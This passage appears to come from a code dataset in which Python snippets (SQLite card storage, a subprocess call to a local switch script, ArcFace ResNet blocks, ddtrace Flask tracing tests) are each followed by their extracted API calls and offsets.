        return sqlite3.connect("./db.sqlite")

    def add_card(self, card_title, card_text, card_link_text, card_link_url):
        con = self.get_connection()
        cur = con.cursor()

        create_table_query = "CREATE TABLE IF NOT EXISTS cards('card_title' VARCHAR," + \
                             " 'card_text' TEXT, 'card_link_text' VARCHAR, 'card_link_url' VARCHAR )"

        # Use a parameterized query so string values are quoted correctly
        # and SQL injection is avoided.
        insert_data_query = "INSERT INTO cards VALUES (?, ?, ?, ?)"

        try:
            cur.execute(create_table_query)
            cur.execute(insert_data_query,
                        (card_title, card_text, card_link_text, card_link_url))
            con.commit()
        except sqlite3.Error:
            print("an error has occurred !")
[ "sqlite3.connect" ]
[((78, 108), 'sqlite3.connect', 'sqlite3.connect', (['"""./db.sqlite"""'], {}), "('./db.sqlite')\n", (93, 108), False, 'import sqlite3\n')]
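For illustration only (not part of the original snippet): the Database class above can be exercised like this; the card values are made up.

# Hypothetical usage of the Database class defined above.
db = Database()
db.add_card(
    "Weather",                      # card_title
    "Sunny with a chance of rain",  # card_text
    "Read more",                    # card_link_text
    "https://example.com/weather",  # card_link_url
)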
import subprocess

subprocess.Popen(['sh', '../Switches/Switch3_On.sh'])
[ "subprocess.Popen" ]
[((18, 71), 'subprocess.Popen', 'subprocess.Popen', (["['sh', '../Switches/Switch3_On.sh']"], {}), "(['sh', '../Switches/Switch3_On.sh'])\n", (34, 71), False, 'import subprocess\n')]
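A hedged variant of the one-liner above: subprocess.run with check=True waits for the shell script to finish and raises CalledProcessError on a non-zero exit code, which is often preferable to a fire-and-forget Popen. The script path is taken from the original snippet.

import subprocess

# Run the switch script, block until it finishes, and fail loudly on error.
subprocess.run(['sh', '../Switches/Switch3_On.sh'], check=True)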
from collections import namedtuple import torch from torch.nn import (AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid) # yapf: disable """ ArcFace implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch) # isort:skip # noqa """ # yapf: enable class Flatten(Module): """Flatten Module.""" def forward(self, input): return input.view(input.size(0), -1) def l2_norm(input, axis=1): """l2 normalization. Args: input (torch.Tensor): The input tensor. axis (int, optional): Specifies which axis of input to calculate the norm across. Defaults to 1. Returns: Tensor: Tensor after L2 normalization per-instance. """ norm = torch.norm(input, 2, axis, True) output = torch.div(input, norm) return output class Bottleneck(namedtuple('Block', ['in_channel', 'depth', 'stride'])): """A named tuple describing a ResNet block.""" def get_block(in_channel, depth, num_units, stride=2): """Get a single block config. Args: in_channel (int): Input channels. depth (int): Output channels. num_units (int): Number of unit modules. stride (int, optional): Conv2d stride. Defaults to 2. Returns: list: A list of unit modules' config. """ return [Bottleneck(in_channel, depth, stride) ] + [Bottleneck(depth, depth, 1) for i in range(num_units - 1)] def get_blocks(num_layers): """Get block configs of backbone. Args: num_layers (int): Number of ConvBlock layers in backbone. Raises: ValueError: `num_layers` must be one of [50, 100, 152]. Returns: list: A list of block configs. """ if num_layers == 50: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=4), get_block(in_channel=128, depth=256, num_units=14), get_block(in_channel=256, depth=512, num_units=3) ] elif num_layers == 100: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=13), get_block(in_channel=128, depth=256, num_units=30), get_block(in_channel=256, depth=512, num_units=3) ] elif num_layers == 152: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=8), get_block(in_channel=128, depth=256, num_units=36), get_block(in_channel=256, depth=512, num_units=3) ] else: raise ValueError( 'Invalid number of layers: {}. Must be one of [50, 100, 152]'. format(num_layers)) return blocks class SEModule(Module): """Squeeze-and-Excitation Modules. Args: channels (int): Input channels. reduction (int): Intermediate channels reduction ratio. """ def __init__(self, channels, reduction): super(SEModule, self).__init__() self.avg_pool = AdaptiveAvgPool2d(1) self.fc1 = Conv2d( channels, channels // reduction, kernel_size=1, padding=0, bias=False) self.relu = ReLU(inplace=True) self.fc2 = Conv2d( channels // reduction, channels, kernel_size=1, padding=0, bias=False) self.sigmoid = Sigmoid() def forward(self, x): """Forward Function.""" module_input = x x = self.avg_pool(x) x = self.fc1(x) x = self.relu(x) x = self.fc2(x) x = self.sigmoid(x) return module_input * x class bottleneck_IR(Module): """Intermediate Resblock of bottleneck. Args: in_channel (int): Input channels. depth (int): Output channels. stride (int): Conv2d stride. """ def __init__(self, in_channel, depth, stride): """Intermediate Resblock of bottleneck. Args: in_channel (int): Input channels. depth (int): Output channels. stride (int): Conv2d stride. 
""" super(bottleneck_IR, self).__init__() if in_channel == depth: self.shortcut_layer = MaxPool2d(1, stride) else: self.shortcut_layer = Sequential( Conv2d(in_channel, depth, (1, 1), stride, bias=False), BatchNorm2d(depth)) self.res_layer = Sequential( BatchNorm2d(in_channel), Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False), PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False), BatchNorm2d(depth)) def forward(self, x): """Forward function.""" shortcut = self.shortcut_layer(x) res = self.res_layer(x) return res + shortcut class bottleneck_IR_SE(Module): """Intermediate Resblock of bottleneck with SEModule. Args: in_channel (int): Input channels. depth (int): Output channels. stride (int): Conv2d stride. """ def __init__(self, in_channel, depth, stride): super(bottleneck_IR_SE, self).__init__() if in_channel == depth: self.shortcut_layer = MaxPool2d(1, stride) else: self.shortcut_layer = Sequential( Conv2d(in_channel, depth, (1, 1), stride, bias=False), BatchNorm2d(depth)) self.res_layer = Sequential( BatchNorm2d(in_channel), Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False), PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False), BatchNorm2d(depth), SEModule(depth, 16)) def forward(self, x): """Forward function.""" shortcut = self.shortcut_layer(x) res = self.res_layer(x) return res + shortcut
[ "torch.nn.Sigmoid", "torch.nn.ReLU", "collections.namedtuple", "torch.nn.BatchNorm2d", "torch.nn.Conv2d", "torch.nn.PReLU", "torch.norm", "torch.nn.MaxPool2d", "torch.nn.AdaptiveAvgPool2d", "torch.div" ]
[((890, 944), 'collections.namedtuple', 'namedtuple', (['"""Block"""', "['in_channel', 'depth', 'stride']"], {}), "('Block', ['in_channel', 'depth', 'stride'])\n", (900, 944), False, 'from collections import namedtuple\n'), ((784, 816), 'torch.norm', 'torch.norm', (['input', '(2)', 'axis', '(True)'], {}), '(input, 2, axis, True)\n', (794, 816), False, 'import torch\n'), ((830, 852), 'torch.div', 'torch.div', (['input', 'norm'], {}), '(input, norm)\n', (839, 852), False, 'import torch\n'), ((3144, 3164), 'torch.nn.AdaptiveAvgPool2d', 'AdaptiveAvgPool2d', (['(1)'], {}), '(1)\n', (3161, 3164), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3184, 3261), 'torch.nn.Conv2d', 'Conv2d', (['channels', '(channels // reduction)'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels, channels // reduction, kernel_size=1, padding=0, bias=False)\n', (3190, 3261), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3343, 3361), 'torch.nn.ReLU', 'ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (3347, 3361), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3381, 3458), 'torch.nn.Conv2d', 'Conv2d', (['(channels // reduction)', 'channels'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels // reduction, channels, kernel_size=1, padding=0, bias=False)\n', (3387, 3458), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3543, 3552), 'torch.nn.Sigmoid', 'Sigmoid', ([], {}), '()\n', (3550, 3552), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4378, 4398), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\n', (4387, 4398), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4615, 4638), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\n', (4626, 4638), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4652, 4708), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\n', (4658, 4708), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4722, 4734), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\n', (4727, 4734), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4736, 4787), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\n', (4742, 4787), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4801, 4819), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (4812, 4819), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5379, 5399), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\n', (5388, 5399), False, 'from torch.nn import 
AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5616, 5639), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\n', (5627, 5639), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5653, 5709), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\n', (5659, 5709), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5723, 5735), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\n', (5728, 5735), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5737, 5788), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\n', (5743, 5788), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5802, 5820), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (5813, 5820), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4475, 4528), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\n', (4481, 4528), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4546, 4564), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (4557, 4564), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5476, 5529), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\n', (5482, 5529), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5547, 5565), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (5558, 5565), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n')]
# -*- coding: utf-8 -*- from ddtrace.compat import PY2 from ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY from ddtrace.contrib.flask.patch import flask_version from ddtrace.ext import http from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID, HTTP_HEADER_PARENT_ID from flask import abort from . import BaseFlaskTestCase from ...utils import assert_span_http_status_code base_exception_name = 'builtins.Exception' if PY2: base_exception_name = 'exceptions.Exception' class FlaskRequestTestCase(BaseFlaskTestCase): def test_request(self): """ When making a request We create the expected spans """ @self.app.route('/') def index(): return 'Hello Flask', 200 res = self.client.get('/') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') spans = self.get_spans() self.assertEqual(len(spans), 8) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.index', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET /') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 0) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('flask.endpoint'), 'index') self.assertEqual(req_span.get_tag('flask.url_rule'), '/') self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/') assert_span_http_status_code(req_span, 200) assert http.QUERY_STRING not in req_span.meta # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index') self.assertEqual(handler_span.resource, '/') self.assertEqual(req_span.error, 0) def test_request_query_string_trace(self): """Make sure when making a request that we create the expected spans and capture the query string.""" @self.app.route('/') def index(): return 'Hello Flask', 200 with self.override_http_config('flask', dict(trace_query_string=True)): self.client.get('/?foo=bar&baz=biz') spans = self.get_spans() # Request tags assert spans[0].get_tag(http.QUERY_STRING) == 'foo=bar&baz=biz' def test_analytics_global_on_integration_default(self): """ When making a request When an integration trace search is not event sample rate is not set and globally trace search is enabled We expect the root span to have the appropriate tag """ @self.app.route('/') def index(): return 'Hello Flask', 200 with self.override_global_config(dict(analytics_enabled=True)): res = self.client.get('/') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') root = self.get_root_span() root.assert_matches( name='flask.request', metrics={ ANALYTICS_SAMPLE_RATE_KEY: 1.0, }, ) for span in self.spans: if span == root: continue self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY)) def test_analytics_global_on_integration_on(self): """ When making a request When an integration trace search is enabled and sample rate is set and globally trace search is enabled We expect the root span to have the appropriate tag """ @self.app.route('/') def index(): return 
'Hello Flask', 200 with self.override_global_config(dict(analytics_enabled=True)): with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)): res = self.client.get('/') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') root = self.get_root_span() root.assert_matches( name='flask.request', metrics={ ANALYTICS_SAMPLE_RATE_KEY: 0.5, }, ) for span in self.spans: if span == root: continue self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY)) def test_analytics_global_off_integration_default(self): """ When making a request When an integration trace search is not set and sample rate is set and globally trace search is disabled We expect the root span to not include tag """ @self.app.route('/') def index(): return 'Hello Flask', 200 with self.override_global_config(dict(analytics_enabled=False)): res = self.client.get('/') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') root = self.get_root_span() self.assertIsNone(root.get_metric(ANALYTICS_SAMPLE_RATE_KEY)) for span in self.spans: if span == root: continue self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY)) def test_analytics_global_off_integration_on(self): """ When making a request When an integration trace search is enabled and sample rate is set and globally trace search is disabled We expect the root span to have the appropriate tag """ @self.app.route('/') def index(): return 'Hello Flask', 200 with self.override_global_config(dict(analytics_enabled=False)): with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)): res = self.client.get('/') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') root = self.get_root_span() root.assert_matches( name='flask.request', metrics={ ANALYTICS_SAMPLE_RATE_KEY: 0.5, }, ) for span in self.spans: if span == root: continue self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY)) def test_distributed_tracing(self): """ When making a request When distributed tracing headers are present We create the expected spans """ @self.app.route('/') def index(): return 'Hello Flask', 200 # Default: distributed tracing enabled res = self.client.get('/', headers={ HTTP_HEADER_PARENT_ID: '12345', HTTP_HEADER_TRACE_ID: '678910', }) self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') # Assert parent and trace id are properly set on the root span span = self.find_span_by_name(self.get_spans(), 'flask.request') self.assertEqual(span.trace_id, 678910) self.assertEqual(span.parent_id, 12345) # Explicitly enable distributed tracing with self.override_config('flask', dict(distributed_tracing_enabled=True)): res = self.client.get('/', headers={ HTTP_HEADER_PARENT_ID: '12345', HTTP_HEADER_TRACE_ID: '678910', }) self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') # Assert parent and trace id are properly set on the root span span = self.find_span_by_name(self.get_spans(), 'flask.request') self.assertEqual(span.trace_id, 678910) self.assertEqual(span.parent_id, 12345) # With distributed tracing disabled with self.override_config('flask', dict(distributed_tracing_enabled=False)): res = self.client.get('/', headers={ HTTP_HEADER_PARENT_ID: '12345', HTTP_HEADER_TRACE_ID: '678910', }) self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') # Assert parent and trace id are properly set on the root span span = self.find_span_by_name(self.get_spans(), 'flask.request') 
self.assertNotEqual(span.trace_id, 678910) self.assertIsNone(span.parent_id) def test_request_query_string(self): """ When making a request When the request contains a query string We create the expected spans """ @self.app.route('/') def index(): return 'Hello Flask', 200 res = self.client.get('/', query_string=dict(hello='flask')) self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') spans = self.get_spans() self.assertEqual(len(spans), 8) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.index', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') # Note: contains no query string self.assertEqual(req_span.resource, 'GET /') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 0) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('flask.endpoint'), 'index') # Note: contains no query string self.assertEqual(req_span.get_tag('flask.url_rule'), '/') self.assertEqual(req_span.get_tag('http.method'), 'GET') # Note: contains no query string self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/') assert_span_http_status_code(req_span, 200) # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index') # Note: contains no query string self.assertEqual(handler_span.resource, '/') self.assertEqual(req_span.error, 0) def test_request_unicode(self): """ When making a request When the url contains unicode We create the expected spans """ @self.app.route(u'/üŋïĉóđē') def unicode(): return 'üŋïĉóđē', 200 res = self.client.get(u'/üŋïĉóđē') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'\xc3\xbc\xc5\x8b\xc3\xaf\xc4\x89\xc3\xb3\xc4\x91\xc4\x93') spans = self.get_spans() self.assertEqual(len(spans), 8) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.unicode', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, u'GET /üŋïĉóđē') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 0) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('flask.endpoint'), 'unicode') self.assertEqual(req_span.get_tag('flask.url_rule'), u'/üŋïĉóđē') self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), u'http://localhost/üŋïĉóđē') assert_span_http_status_code(req_span, 200) # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.unicode') self.assertEqual(handler_span.resource, 
u'/üŋïĉóđē') self.assertEqual(req_span.error, 0) def test_request_404(self): """ When making a request When the requested endpoint was not found We create the expected spans """ res = self.client.get('/not-found') self.assertEqual(res.status_code, 404) spans = self.get_spans() self.assertEqual(len(spans), 9) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'flask.handle_user_exception', 'flask.handle_http_exception', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET 404') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 0) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found') assert_span_http_status_code(req_span, 404) # Dispatch span dispatch_span = spans[3] self.assertEqual(dispatch_span.service, 'flask') self.assertEqual(dispatch_span.name, 'flask.dispatch_request') self.assertEqual(dispatch_span.resource, 'flask.dispatch_request') self.assertEqual(dispatch_span.error, 1) self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found')) self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound') def test_request_abort_404(self): """ When making a request When the requested endpoint calls `abort(404)` We create the expected spans """ @self.app.route('/not-found') def not_found(): abort(404) res = self.client.get('/not-found') self.assertEqual(res.status_code, 404) spans = self.get_spans() self.assertEqual(len(spans), 10) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.not_found', 'flask.handle_user_exception', 'flask.handle_http_exception', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET /not-found') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 0) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found') assert_span_http_status_code(req_span, 404) self.assertEqual(req_span.get_tag('flask.endpoint'), 'not_found') self.assertEqual(req_span.get_tag('flask.url_rule'), '/not-found') # Dispatch span dispatch_span = spans[3] self.assertEqual(dispatch_span.service, 'flask') self.assertEqual(dispatch_span.name, 'flask.dispatch_request') self.assertEqual(dispatch_span.resource, 'flask.dispatch_request') self.assertEqual(dispatch_span.error, 1) self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found')) 
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound') # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.not_found') self.assertEqual(handler_span.resource, '/not-found') self.assertEqual(handler_span.error, 1) self.assertTrue(handler_span.get_tag('error.msg').startswith('404 Not Found')) self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound') def test_request_500(self): """ When making a request When the requested endpoint raises an exception We create the expected spans """ @self.app.route('/500') def fivehundred(): raise Exception('500 error') res = self.client.get('/500') self.assertEqual(res.status_code, 500) spans = self.get_spans() self.assertEqual(len(spans), 9) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.fivehundred', 'flask.handle_user_exception', 'flask.handle_exception', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET /500') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 1) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500') assert_span_http_status_code(req_span, 500) self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred') self.assertEqual(req_span.get_tag('flask.url_rule'), '/500') # Dispatch span dispatch_span = spans[3] self.assertEqual(dispatch_span.service, 'flask') self.assertEqual(dispatch_span.name, 'flask.dispatch_request') self.assertEqual(dispatch_span.resource, 'flask.dispatch_request') self.assertEqual(dispatch_span.error, 1) self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name) # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundred') self.assertEqual(handler_span.resource, '/500') self.assertEqual(handler_span.error, 1) self.assertTrue(handler_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(handler_span.get_tag('error.type'), base_exception_name) # User exception span user_ex_span = spans[5] self.assertEqual(user_ex_span.service, 'flask') self.assertEqual(user_ex_span.name, 'flask.handle_user_exception') self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception') self.assertEqual(user_ex_span.error, 1) self.assertTrue(user_ex_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(user_ex_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(user_ex_span.get_tag('error.type'), base_exception_name) 
def test_request_501(self): """ When making a request When the requested endpoint calls `abort(501)` We create the expected spans """ @self.app.route('/501') def fivehundredone(): abort(501) res = self.client.get('/501') self.assertEqual(res.status_code, 501) spans = self.get_spans() self.assertEqual(len(spans), 10) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.fivehundredone', 'flask.handle_user_exception', 'flask.handle_http_exception', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET /501') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 1) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/501') assert_span_http_status_code(req_span, 501) self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundredone') self.assertEqual(req_span.get_tag('flask.url_rule'), '/501') # Dispatch span dispatch_span = spans[3] self.assertEqual(dispatch_span.service, 'flask') self.assertEqual(dispatch_span.name, 'flask.dispatch_request') self.assertEqual(dispatch_span.resource, 'flask.dispatch_request') self.assertEqual(dispatch_span.error, 1) self.assertTrue(dispatch_span.get_tag('error.msg').startswith('501 Not Implemented')) self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback')) 